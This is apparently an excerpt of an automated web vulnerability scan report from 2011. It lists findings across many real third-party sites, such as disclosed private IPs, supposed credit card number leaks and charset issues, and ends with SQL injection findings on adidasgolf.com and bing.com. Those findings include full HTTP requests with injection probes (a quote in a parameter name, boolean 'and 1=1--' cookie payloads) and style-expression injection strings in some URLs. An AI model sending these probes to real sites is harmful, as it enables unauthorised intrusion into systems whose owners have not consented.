24.210. http://www.slideshare.net/VigLink/3-ray-lyleviglink-forumcon-ppt1

24.211. http://www.slideshare.net/rss/slideshow/id/6978368

24.212. http://www.socialfollow.com/button/

24.213. http://www.sourceconference.com/about/contact.asp

24.214. http://www.sourceconference.com/about/press.asp

24.215. http://www.sourceconference.com/about/team.asp

24.216. http://www.sourceconference.com/boston/

24.217. http://www.sourceconference.com/boston/evening.asp

24.218. http://www.sourceconference.com/boston/mentors.asp

24.219. http://www.sourceconference.com/boston/speakers_2009.asp

24.220. http://www.sourceconference.com/boston/sponsors.asp

24.221. http://www.sourceconference.com/boston/student.asp

24.222. http://www.sourceconference.com/seattle/travel.asp

24.223. http://www.southparkstudios.com/

24.224. http://www.southparkstudios.com/account/login

24.225. http://www.southparkstudios.com/clips/360434/god-bless-you-captain-hindsight

24.226. http://www.southparkstudios.com/guide/episodes/

24.227. http://www.southparkstudios.com/layout/common/js/widgets/twitter.js

24.228. http://www.viglink.com/

24.229. http://www.viglink.com/about

24.230. http://www.viglink.com/corp/merchants

24.231. http://www.viglink.com/corp/publishers

24.232. http://www.viglink.com/demo

24.233. http://www.viglink.com/jobs

24.234. http://www.viglink.com/partners

24.235. http://www.viglink.com/policies/ftc

24.236. http://www.viglink.com/policies/privacy

24.237. http://www.viglink.com/policies/tos

24.238. http://www.viglink.com/support/api

24.239. http://www.viglink.com/support/faq

24.240. http://www.viglink.com/users/login

24.241. http://www.viglink.com/users/send-verification

24.242. http://www.viglink.com/users/signup

24.243. https://www.viglink.com/users/action/login

24.244. http://www.vs-db.info/

24.245. http://www.weather.gov/climate/index.php

24.246. http://www.weather.gov/climate/info.php

24.247. http://www.weather.gov/climate/local_data.php

24.248. http://www.weather.gov/forecasts/graphical/images//MaxT1_.png

24.249. http://www.weather.gov/forecasts/wfo/images//MaxT1_.png

24.250. http://www.weather.gov/view/largemap.php

24.251. http://www.weather.gov/view/national.php

24.252. http://www.weather.gov/view/nationalwarnings.php

24.253. http://www.weather.gov/view/states.php

24.254. http://www.weather.gov/view/survey/nws-survey.php

24.255. http://www.weather.gov/view/validProds.php

24.256. http://www.wrh.noaa.gov/sew/main.php

24.257. http://www.wrh.noaa.gov/sew/main.php

24.258. http://www2.comscore.com/js/prototype.js

24.259. http://www22.verizon.com/privacy/

24.260. http://www4.tinker.com/standard/js/curvycorners.js

25. Private IP addresses disclosed

25.1. http://www.activeendurance.com/running.htm

25.2. http://www.activegovernment.com/marketing-services/municipal-marketing.htm

25.3. http://www.adobe.com/support/security/advisories/apsa11-01.html

25.4. http://www.adobe.com/support/security/advisories/apsa11-02.html

25.5. http://www.cisco.com/en/US/docs/security/nac/guestserver/release_notes/20/gsrn20.html

25.6. http://www.facebook.com/2008/fbml

25.7. http://www.facebook.com/angie.eronson

25.8. http://www.facebook.com/campaign/landing.php

25.9. http://www.facebook.com/campaign/landing.php

25.10. http://www.facebook.com/chester.mitre

25.11. http://www.facebook.com/extern/login_status.php

25.12. http://www.facebook.com/extern/login_status.php

25.13. http://www.facebook.com/extern/login_status.php

25.14. http://www.facebook.com/extern/login_status.php

25.15. http://www.facebook.com/extern/login_status.php

25.16. http://www.facebook.com/extern/login_status.php

25.17. http://www.facebook.com/extern/login_status.php

25.18. http://www.facebook.com/extern/login_status.php

25.19. http://www.facebook.com/extern/login_status.php

25.20. http://www.facebook.com/extern/login_status.php

25.21. http://www.facebook.com/extern/login_status.php

25.22. http://www.facebook.com/extern/login_status.php

25.23. http://www.facebook.com/extern/login_status.php

25.24. http://www.facebook.com/extern/login_status.php

25.25. http://www.facebook.com/extern/login_status.php

25.26. http://www.facebook.com/extern/login_status.php

25.27. http://www.facebook.com/extern/login_status.php

25.28. http://www.facebook.com/extern/login_status.php

25.29. http://www.facebook.com/pages/Glamcom/144180538945796

25.30. http://www.facebook.com/pages/Theron-Zahn-KOMO/180364211988503

25.31. http://www.facebook.com/plugins/activity.php

25.32. http://www.facebook.com/plugins/activity.php

25.33. http://www.facebook.com/plugins/activity.php

25.34. http://www.facebook.com/plugins/activity.php

25.35. http://www.facebook.com/plugins/activity.php

25.36. http://www.facebook.com/plugins/activity.php

25.37. http://www.facebook.com/plugins/activity.php

25.38. http://www.facebook.com/plugins/activity.php

25.39. http://www.facebook.com/plugins/activity.php

25.40. http://www.facebook.com/plugins/activity.php

25.41. http://www.facebook.com/plugins/activity.php

25.42. http://www.facebook.com/plugins/activity.php

25.43. http://www.facebook.com/plugins/facepile.php

25.44. http://www.facebook.com/plugins/facepile.php

25.45. http://www.facebook.com/plugins/like.php

25.46. http://www.facebook.com/plugins/like.php

25.47. http://www.facebook.com/plugins/like.php

25.48. http://www.facebook.com/plugins/like.php

25.49. http://www.facebook.com/plugins/like.php

25.50. http://www.facebook.com/plugins/like.php

25.51. http://www.facebook.com/plugins/like.php

25.52. http://www.facebook.com/plugins/like.php

25.53. http://www.facebook.com/plugins/like.php

25.54. http://www.facebook.com/plugins/like.php

25.55. http://www.facebook.com/plugins/like.php

25.56. http://www.facebook.com/plugins/like.php

25.57. http://www.facebook.com/plugins/like.php

25.58. http://www.facebook.com/plugins/like.php

25.59. http://www.facebook.com/plugins/like.php

25.60. http://www.facebook.com/plugins/like.php

25.61. http://www.facebook.com/plugins/like.php

25.62. http://www.facebook.com/plugins/like.php

25.63. http://www.facebook.com/plugins/like.php

25.64. http://www.facebook.com/plugins/like.php

25.65. http://www.facebook.com/plugins/like.php

25.66. http://www.facebook.com/plugins/like.php

25.67. http://www.facebook.com/plugins/like.php

25.68. http://www.facebook.com/plugins/like.php

25.69. http://www.facebook.com/plugins/like.php

25.70. http://www.facebook.com/plugins/likebox.php

25.71. http://www.facebook.com/plugins/likebox.php

25.72. http://www.facebook.com/plugins/likebox.php

25.73. http://www.facebook.com/plugins/likebox.php

25.74. http://www.facebook.com/plugins/likebox.php

25.75. http://www.facebook.com/profile.php

25.76. http://www.facebook.com/viglink

25.77. http://www.facebook.com/widgets/recommendations.php

25.78. http://www.google.com/sdch/rU20-FBA.dct

25.79. http://www.southparkstudios.com/

25.80. http://www.southparkstudios.com/clips/360434/god-bless-you-captain-hindsight

25.81. http://www.ups.com/europe/fr/freindex.html

25.82. http://www.viglink.com/

25.83. http://www.viglink.com/about

25.84. http://www.viglink.com/corp/merchants

25.85. http://www.viglink.com/corp/merchants

25.86. http://www.viglink.com/corp/publishers

25.87. http://www.viglink.com/corp/publishers

25.88. http://www.viglink.com/demo

25.89. http://www.viglink.com/demo

25.90. http://www.viglink.com/jobs

25.91. http://www.viglink.com/partners

25.92. http://www.viglink.com/partners

25.93. http://www.viglink.com/policies/ftc

25.94. http://www.viglink.com/policies/privacy

25.95. http://www.viglink.com/policies/privacy

25.96. http://www.viglink.com/policies/tos

25.97. http://www.viglink.com/support/api

25.98. http://www.viglink.com/support/api

25.99. http://www.viglink.com/support/faq

25.100. http://www.viglink.com/users/login

25.101. http://www.viglink.com/users/login

25.102. http://www.viglink.com/users/send-verification

25.103. http://www.viglink.com/users/send-verification

25.104. http://www.viglink.com/users/signup

25.105. http://www.viglink.com/users/signup

25.106. https://www.viglink.com/users/action/login

25.107. http://www35.glam.com/gad/glamadapt_jsrv.act

25.108. http://www35.glam.com/gad/glamadapt_jsrv.act

25.109. http://www35.glam.com/gad/glamadapt_jsrv.act

25.110. http://www35.glam.com/gad/glamadapt_jsrv.act

25.111. http://www35.glam.com/gad/glamadapt_jsrv.act

25.112. http://www35.glam.com/gad/glamadapt_jsrv.act

25.113. http://www35.glam.com/gad/glamadapt_jsrv.act

25.114. http://www35.glam.com/gad/glamadapt_jsrv.act

25.115. http://www35.glam.com/gad/glamadapt_jsrv.act

25.116. http://www35.glam.com/gad/glamadapt_jsrv.act

25.117. http://www35.glam.com/gad/glamadapt_jsrv.act

25.118. http://www35.glam.com/gad/glamadapt_jsrv.act

25.119. http://www35.glam.com/gad/glamadapt_jsrv.act

25.120. http://www35.glam.com/gad/glamadapt_jsrv.act

25.121. http://www35.glam.com/gad/glamadapt_jsrv.act

25.122. http://www35.glam.com/gad/glamadapt_jsrv.act

25.123. http://www35.glam.com/gad/glamadapt_jsrv.act

25.124. http://www35.glam.com/gad/glamadapt_jsrv.act

25.125. http://www35.glam.com/gad/glamadapt_jsrv.act

25.126. http://www35.glam.com/gad/glamadapt_jsrv.act

25.127. http://www35.glam.com/gad/glamadapt_jsrv.act

25.128. http://www35.glam.com/gad/glamadapt_jsrv.act

25.129. http://www35.glam.com/gad/glamadapt_jsrv.act

25.130. http://www35.glam.com/gad/glamadapt_jsrv.act

25.131. http://www35.glam.com/gad/glamadapt_jsrv.act

25.132. http://www35.glam.com/gad/glamadapt_jsrv.act

25.133. http://www35.glam.com/gad/glamadapt_jsrv.act

25.134. http://www35.glam.com/gad/glamadapt_jsrv.act

25.135. http://www35.glam.com/gad/glamadapt_jsrv.act

25.136. http://www35.glam.com/gad/glamadapt_jsrv.act

25.137. http://www35.glam.com/gad/glamadapt_jsrv.act

25.138. http://www35.glam.com/gad/glamadapt_jsrv.act

25.139. http://www35.glam.com/gad/glamadapt_jsrv.act

25.140. http://www35.glam.com/gad/glamadapt_jsrv.act

25.141. http://www35.glam.com/gad/glamadapt_jsrv.act

25.142. http://www35.glam.com/gad/glamadapt_jsrv.act

25.143. http://www35.glam.com/gad/glamadapt_jsrv.act

25.144. http://www35.glam.com/gad/glamadapt_jsrv.act

25.145. http://www35.glam.com/gad/glamadapt_jsrv.act

25.146. http://www35.glam.com/gad/glamadapt_jsrv.act

25.147. http://www35.glam.com/gad/glamadapt_jsrv.act

25.148. http://www35.glam.com/gad/glamadapt_jsrv.act

25.149. http://www35.glam.com/gad/glamadapt_jsrv.act

25.150. http://www35.glam.com/gad/glamadapt_jsrv.act

25.151. http://www35.glam.com/gad/glamadapt_jsrv.act

25.152. http://www35.glam.com/gad/glamadapt_jsrv.act

25.153. http://www35.glam.com/gad/glamadapt_jsrv.act

25.154. http://www35.glam.com/gad/glamadapt_jsrv.act

25.155. http://www4.tinker.com/standard/js/map/mappref.js

26. Credit card numbers disclosed

26.1. http://www.bing.com/search

26.2. http://www.komonews.com/news/health

26.3. http://www.komonews.com/younews/116761799.html

26.4. http://www.massey-coldbeck.co.uk/zoom_index.js

26.5. http://www.opxconsulting.com/images/pdf/arizona_public_service.pdf

26.6. http://www.opxconsulting.com/images/pdf/cnp.pdf

26.7. http://www.slideshare.net/

26.8. http://www.slideshare.net/AutoSurfRestarter/lyle-lite-16-easy-chord-solos-arranged-by-ukulele-jazz-master-jumpin-jims-ukulele-masters-by-lyle

26.9. http://www.slideshare.net/AutoSurfRestarter/lyle-lyle-crocodile-lyle-the-crocodile-by-bernard-waber

26.10. http://www.slideshare.net/Mzyra/ryman-legacy-chapter-10c

26.11. http://www.slideshare.net/VigLink

26.12. http://www.slideshare.net/VigLink/2-dan-gill-huddler

26.13. http://www.slideshare.net/VigLink/3-ray-lyleviglink-forumcon-ppt1

26.14. http://www.slideshare.net/betdelmar/pinta-tu-vida-presentation-609143

26.15. http://www.slideshare.net/lylevjohnson/florida-scenes-3210581

26.16. http://www.slideshare.net/tinamomo/christinaliu-5400505

26.17. http://www.slideshare.net/tinamomo/cl01

26.18. http://www.slideshare.net/tinamomo/cl02

26.19. http://www.slideshare.net/tinamomo/cl03-5400934

27. Robots.txt file

27.1. http://www.awin1.com/cread.php

27.2. http://www.barracudalabs.com/

27.3. http://www.bing.com/

27.4. http://www.bizographics.com/collect/

27.5. http://www.brash.com/

27.6. http://www.google-analytics.com/__utm.gif

27.7. http://www.googleadservices.com/pagead/conversion/1045336492/

27.8. http://www.insideup.com/openx/www/delivery/ajs.php

27.9. http://www.manta.com/c/mtl07lp/industrial-waste-recovery-llc

27.10. http://www.metropcs.com/

27.11. http://www.microsoft.com/technet/security/bulletin/alertus.aspx

27.12. http://www.microsoftstore.com/store/msstore/en_US/buy/pageType.product/externalRefID.8D6DDFB5

27.13. http://www.murraynewlands.com/

27.14. http://www.net-security.org/

27.15. http://www.opensource.org/licenses/gpl-license.php

27.16. http://www.purewire.com/

27.17. http://www.regonline.com/Register/Checkin.aspx

27.18. https://www.regonline.com/Register/Checkin.aspx

27.19. http://www.reputation.com/min/

27.20. https://www.reputation.com/products

27.21. http://www.rsa.com/

27.22. http://www.securityfocus.com/bid/47092/

27.23. http://www.socialfollow.com/blog/wp-content/plugins/wp-email/email-css.css

27.24. http://www.southparkstudios.com/clips/360434/god-bless-you-captain-hindsight

27.25. https://www.viglink.com/users/action/login

27.26. http://www.wildwest2.com/favicon.ico

27.27. http://www.zynga.com/

27.28. http://yardbarker.tags.crwdcntrl.net/cc.js

28. Cacheable HTTPS response

28.1. https://www.barracudanetworks.com/ns/get_states_for_country.php

28.2. https://www.barracudanetworks.com/ns/products/request_eval_unit.php

28.3. https://www.demandstudios.com/application.html

28.4. https://www.eff.org/

28.5. https://www.google.com/adsense/support/bin/request.py

28.6. https://www.regonline.com/

28.7. https://www.regonline.com/__images/global/favicon.ico

28.8. https://www.regonline.com/__js.axd

28.9. https://www.rei.com/favicon.ico

28.10. https://www.reputation.com/fonts/museo_sans/woff/8eff19a509bda9cced7ef4042059bdb7.woff

28.11. https://www.reputation.com/fonts/museo_sans/woff/be29def0d790180f0854fa62b8b12182.woff

28.12. https://www.reputation.com/fonts/museo_sans/woff/eda63a6ee6304b30ff670d77f33286f8.woff

28.13. https://www.sitefinity.com/login.aspx

29. Multiple content types specified

30. HTML does not specify charset

30.1. http://www.4shared.com/advertise/banners/desktop/300x250.jsp

30.2. http://www.4shared.com/advertise/banners/desktop/728x90.jsp

30.3. http://www.attackresearch.com/

30.4. http://www.awin1.com/cread.php

30.5. https://www.barracudanetworks.com/ns/get_states_for_country.php

30.6. http://www.caribbean-ocean.com/

30.7. http://www.caribbean-ocean.com/enq.php/%22%20stYle=%22x:expre/**/images/aus-spec.gif

30.8. http://www.caribbean-ocean.com/enq.php/%22%20stYle=%22x:expre/**/images/dubai-expert.jpg

30.9. http://www.caribbean-ocean.com/enq.php/%22%20stYle=%22x:expre/**/stylesheet.css

30.10. http://www.caribbean-ocean.com/enq.php/images/aus-spec.gif

30.11. http://www.caribbean-ocean.com/enq.php/images/dubai-expert.jpg

30.12. http://www.caribbean-ocean.com/enq.php/stylesheet.css

30.13. http://www.caribbean-ocean.com/get-in-touch.php/%22%20stYle=%22x:expre/**/images/aus-spec.gif

30.14. http://www.caribbean-ocean.com/get-in-touch.php/%22%20stYle=%22x:expre/**/images/dubai-expert.jpg

30.15. http://www.caribbean-ocean.com/get-in-touch.php/%22%20stYle=%22x:expre/**/stylesheet.css

30.16. http://www.caribbean-ocean.com/get-in-touch.php/images/aus-spec.gif

30.17. http://www.caribbean-ocean.com/get-in-touch.php/images/dubai-expert.jpg

30.18. http://www.caribbean-ocean.com/get-in-touch.php/stylesheet.css

30.19. http://www.caribbean-ocean.com/styles.css

30.20. http://www.caribbean-ocean.com/stylesheet.css

30.21. http://www.caribbean-ocean.com/tabs.js

30.22. http://www.coach.com/wcsstore/Coach_US/scripts/GWT/C8CD5EE6AB91C7A8DC36FB96A08AB26A.cache.html

30.23. http://www.crh.noaa.gov/product.php

30.24. https://www.digitalbond.com/favicon.ico

30.25. http://www.internetnews.com/img/blog/gradient.gif

30.26. http://www.inversepath.com/

30.27. http://www.longislanderotic.com/favicon.ico

30.28. http://www.manta.com/manta/mads/generic.html

30.29. http://www.massey-coldbeck.co.uk/favicon.ico

30.30. http://www.massey-coldbeck.co.uk/images/2col_rightNav.css

30.31. http://www.massey-coldbeck.co.uk/images/images/menu/menu_.js

30.32. http://www.massey-coldbeck.co.uk/images/logo_cemp.gif

30.33. http://www.metropcs.com/assets/v3/fonts/helveticaneueltstd-bdcn-webfont.woff

30.34. http://www.navcen.uscg.gov/

30.35. http://www.nutter.com/attorneys.php

30.36. http://www.nutter.com/careers.php

30.37. http://www.nutter.com/home.php

30.38. http://www.nutter.com/media/swf/media/industries/media.212.jpg

30.39. http://www.opxconsulting.com/favicon.ico

30.40. http://www.pwnieexpress.com/

30.41. http://www.skichalets.co.uk/top/Crossfader.js

30.42. http://www.socialfollow.com/js/flash-detect.js

30.43. http://www.socialfollow.com/js/jquery.js

30.44. http://www.socialfollow.com/js/thickbox.js

30.45. http://www.socialfollow.com/js/validator.js

30.46. http://www.sourceconference.com/

30.47. http://www.sourceconference.com/about/

30.48. http://www.sourceconference.com/about/contact.asp

30.49. http://www.sourceconference.com/about/default.asp

30.50. http://www.sourceconference.com/about/policies.asp

30.51. http://www.sourceconference.com/about/press.asp

30.52. http://www.sourceconference.com/about/team.asp

30.53. http://www.sourceconference.com/barcelona/speakers_2009.asp

30.54. http://www.sourceconference.com/barcelona/speakers_2010.asp

30.55. http://www.sourceconference.com/barcelona/sponsors.asp

30.56. http://www.sourceconference.com/barcelona/training.asp

30.57. http://www.sourceconference.com/barcelona/travel.asp

30.58. http://www.sourceconference.com/boston/

30.59. http://www.sourceconference.com/boston/evening.asp

30.60. http://www.sourceconference.com/boston/mentors.asp

30.61. http://www.sourceconference.com/boston/ptes.asp

30.62. http://www.sourceconference.com/boston/speakers_2008.asp

30.63. http://www.sourceconference.com/boston/speakers_2009.asp

30.64. http://www.sourceconference.com/boston/speakers_2010.asp

30.65. http://www.sourceconference.com/boston/speakers_2011.asp

30.66. http://www.sourceconference.com/boston/sponsors.asp

30.67. http://www.sourceconference.com/boston/student.asp

30.68. http://www.sourceconference.com/boston/travel.asp

30.69. http://www.sourceconference.com/merchandise/

30.70. http://www.sourceconference.com/merchandise/artist.asp

30.71. http://www.sourceconference.com/seattle/speakers_2011.asp

30.72. http://www.sourceconference.com/seattle/sponsors.asp

30.73. http://www.sourceconference.com/seattle/travel.asp

30.74. http://www.southparkstudios.com/layout/skin_v3/css/img/cmn/tabs_bg.gif

30.75. http://www.southparkstudios.com/layout/skin_v3jq/css/img/upload/upload_logo_big.jpg

30.76. http://www22.verizon.com/privacy/

30.77. http://www30a2.glam.com/gad/click.act

30.78. http://www4.tinker.com/xd_receiver.htm

30.79. http://www5.jcpenney.com/jcp/css/EstimatedShippingStyles.css

30.80. http://xads.zedo.com/ads3/a

31. HTML uses unrecognised charset

31.1. http://www.barracudacentral.org/

31.2. http://www.weather.gov/view/largemap.php

32. Content type incorrectly stated

32.1. http://www.apache.org/licenses/LICENSE-2.0

32.2. http://www.awin1.com/cread.php

32.3. http://www.barracudanetworks.com/ns/products/gfx/bwb_thumb.gif

32.4. https://www.barracudanetworks.com/ns/get_states_for_country.php

32.5. http://www.bizfind.us/robots.txt

32.6. http://www.bizographics.com/collect/

32.7. http://www.bluefountainmedia.com/favicon.ico

32.8. http://www.bluefountainmedia.com/upload/tinymce/in_the_press.jpg

32.9. http://www.briangardner.com/wp-content/themes/brian_gardner/images/favicon.ico

32.10. http://www.caribbean-ocean.com/styles.css

32.11. http://www.caribbean-ocean.com/stylesheet.css

32.12. http://www.caribbean-ocean.com/tabs.js

32.13. http://www.cudaeye.com/service/user-status.json

32.14. http://www.erh.noaa.gov/favicon.ico

32.15. http://www.erh.noaa.gov/forecast/wxplanner.php

32.16. http://www.erh.noaa.gov/gyx/favicon.ico

32.17. http://www.erh.noaa.gov/wwamap/wwatxtget.php

32.18. http://www.facebook.com/extern/login_status.php

32.19. http://www.glam.com/logincheck.php

32.20. http://www.glam.com/wp-content/themes/glam_v1/glam-lib/geoipRedirect/redirect.php

32.21. http://www.glam.com/wp-content/themes/glam_v1/glam_latest_post_thumb.php

32.22. http://www.google.com/mbd

32.23. http://www.google.com/realtimejs

32.24. http://www.google.com/recaptcha/api/reload

32.25. http://www.insideup.com/ppc/leadflow/style/blackdot.gif

32.26. http://www.insideup.com/ppc/leadflow/sys_images/min.gif

32.27. http://www.insideup.com/ppc/leadflow/sys_images/resize.gif

32.28. http://www.insideup.com/updateCity.html

32.29. http://www.insideup.com/wikiHeaderCity.html

32.30. http://www.intensedebate.com/js/getCommentLink.php

32.31. http://www.leanlogistics.com/favicon.ico

32.32. http://www.massey-coldbeck.co.uk/zoom_titles.js

32.33. http://www.metropcs.com/assets/v3/fonts/helveticaneueltstd-bdcn-webfont.woff

32.34. http://www.quantcast.com/wpapi/menus

32.35. http://www.rei.com/favicon.ico

32.36. http://www.rei.com/pix/memberRewards/2010/sm6314lead.gif

32.37. https://www.rei.com/favicon.ico

32.38. http://www.reputation.com/fonts/museo_sans/woff/be29def0d790180f0854fa62b8b12182.woff

32.39. http://www.reputation.com/fonts/museo_sans/woff/eda63a6ee6304b30ff670d77f33286f8.woff

32.40. http://www.reputation.com/services/ajax_updateShoppingCart.php

32.41. https://www.reputation.com/fonts/museo_sans/woff/8eff19a509bda9cced7ef4042059bdb7.woff

32.42. https://www.reputation.com/fonts/museo_sans/woff/be29def0d790180f0854fa62b8b12182.woff

32.43. https://www.reputation.com/fonts/museo_sans/woff/eda63a6ee6304b30ff670d77f33286f8.woff

32.44. http://www.skichalets.co.uk/top/Crossfader.js

32.45. http://www.socialfollow.com/js/flash-detect.js

32.46. http://www.socialfollow.com/js/jquery.js

32.47. http://www.socialfollow.com/js/thickbox.js

32.48. http://www.socialfollow.com/js/validator.js

32.49. http://www.southparkstudios.com/layout/skin_v3/css/img/cmn/tabs_bg.gif

32.50. http://www.southparkstudios.com/layout/skin_v3jq/css/img/upload/upload_logo_big.jpg

32.51. http://www.weather.gov/favicon.ico

32.52. http://www.wrh.noaa.gov/favicon.ico

32.53. http://www2.comscore.com/analytics

32.54. http://www2.glam.com/app/site/affiliate/viewChannelModule.act

32.55. http://www2.jcpenney.com/jcp/vbscript/AmsScript.vbs

32.56. http://www24a.glam.com/appdir/resources/rendergadget.js

32.57. http://www25.glam.com/appdir/resources/rendergadget.js

32.58. http://www35.glam.com/favicon.ico

32.59. http://www4.jcpenney.com/images/seasonal/facebook_icon.gif

32.60. http://www4.jcpenney.com/images/seasonal/kaboodle_icon.gif

32.61. http://www4.jcpenney.com/images/seasonal/myspace_icon.gif

32.62. http://www4.jcpenney.com/images/seasonal/stylehive_icon.gif

32.63. http://www4.jcpenney.com/jcp/CSS/ProdList.css

32.64. http://www4.jcpenney.com/jcp/vbscript/AmsScript.vbs

32.65. http://www4.tinker.com/standard/event_timeline/

32.66. http://www4.tinker.com/standard/img/ajax-loader-mslogout-wht.gif

32.67. http://www5.jcpenney.com/jcp/vbscript/AmsScript.vbs

33. Content type is not specified

33.1. http://www.4shared.com/favicon.ico

33.2. http://www.bizfind.us/

33.3. http://www25.glam.com/files/gadget-store/installs/84371626942385/flvpath_2-73131245.flv



1. SQL injection  next
There are 32 instances of this issue:

Issue background

SQL injection vulnerabilities arise when user-controllable data is incorporated into database SQL queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query.

Various attacks can be delivered via SQL injection, including reading or modifying critical application data, interfering with application logic, escalating privileges within the database and executing operating system commands.

Issue remediation

The most effective way to prevent SQL injection attacks is to use parameterised queries (also known as prepared statements) for all database access. This method uses two steps to incorporate potentially tainted data into SQL queries: first, the application specifies the structure of the query, leaving placeholders for each item of user input; second, the application specifies the contents of each placeholder. Because the structure of the query has already defined in the first step, it is not possible for malformed data in the second step to interfere with the query structure. You should review the documentation for your database and application platform to determine the appropriate APIs which you can use to perform parameterised queries. It is strongly recommended that you parameterise every variable data item that is incorporated into database queries, even if it is not obviously tainted, to prevent oversights occurring and avoid vulnerabilities being introduced by changes elsewhere within the code base of the application.

You should be aware that some commonly employed and recommended mitigations for SQL injection vulnerabilities are not always effective:



1.1. http://www.adidasgolf.com/ [name of an arbitrarily supplied request parameter]  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.adidasgolf.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /?1'=1 HTTP/1.1
Host: www.adidasgolf.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 500 Internal Server Error
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 6332
Vary: Accept-Encoding
Date: Sat, 26 Feb 2011 02:28:00 GMT
Connection: close

<html>
<head>
<title>The expression contains an invalid string constant: '.</title>
<style>
body {font-family:"Verdana";font-weight:normal;font-size: .7em;color:black;
...[SNIP]...
</b>An unhandled exception occurred during the execution of the current web request. Please review the stack trace for more information about the error and where it originated in the code.

<br>
...[SNIP]...

Request 2

GET /?1''=1 HTTP/1.1
Host: www.adidasgolf.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 12027
Date: Sat, 26 Feb 2011 02:28:01 GMT
Connection: close
Set-Cookie: AuthCookie=; expires=Thu, 26-Feb-1981 02:28:01 GMT; path=/
Set-Cookie: ASP.NET_SessionId=luu5hmm2dkmxwa3cvhectaee; path=/; HttpOnly
Set-Cookie: LastPage=none; expires=Sun, 26-Feb-2012 02:28:01 GMT; path=/
Set-Cookie: CurrentPage=/default.aspx?1''=1; expires=Sun, 26-Feb-2012 02:28:01 GMT; path=/
Set-Cookie: CurrentPage=/default.aspx?1''=1; expires=Sun, 26-Feb-2012 02:28:01 GMT; path=/


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>
   adidasGolf.c
...[SNIP]...

1.2. http://www.bing.com/local/details.aspx [SRCHUID cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.bing.com
Path:   /local/details.aspx

Issue detail

The SRCHUID cookie appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the SRCHUID cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /local/details.aspx?lid=YN786x143652687&qt=yp&what=8034286771&where=Washington%2c+District+of+Columbia&s_cid=ansPhBkYp02&mkt=en-us&q=8034286771&FORM=LARE HTTP/1.1
Host: www.bing.com
Proxy-Connection: keep-alive
Referer: http://www.bing.com/search?q=8034286771&go=&form=QBRE&qs=n&sk=
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SRCHUID=V=2&GUID=F7578C9AAF894F8C831EB5E336C5B689'%20and%201%3d1--%20; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110215; _UR=OMW=1; SRCHD=MS=1655311&SM=1&D=1644428&AF=NOFORM; MUID=FA3AE6176FAC4414AD6FC26C726B4B15; _FP=BDCE=129432394472338527&BDCEH=8D8DA4372A34906CD86E2A002A63F9CC; _HOP=; RMS=F=O&A=SAAAAAAAAQ; _SS=SID=641CB7A32570469C873045A16513C459&CW=1437&bIm=556&hIm=100

Response 1

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Expires: Sat, 26 Feb 2011 02:21:38 GMT
Last-Modified: Sat, 26 Feb 2011 00:21:38 GMT
X-BM-TraceID: 6c1547c0da0f4e5597e01caf67ef9a1f
X-AspNet-Version: 2.0.50727
X-BM-Srv: BL2M001210
Vary: Accept-Encoding
Date: Sat, 26 Feb 2011 00:21:38 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: BID=5553272bdb174b40a3bb4c7a64a8916e; path=/local
Set-Cookie: CID=03e21cf236904861b0798bbcba22dfa1; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/local
Set-Cookie: CDate=2/26/2011 12:21:38 AM; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/local
Set-Cookie: _FS=mkt=en-US; domain=.bing.com; path=/
Content-Length: 282556


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns = "http://www.w3.org/1999/xhtml" xmlns:web = "http://schema
...[SNIP]...
<![CDATA[
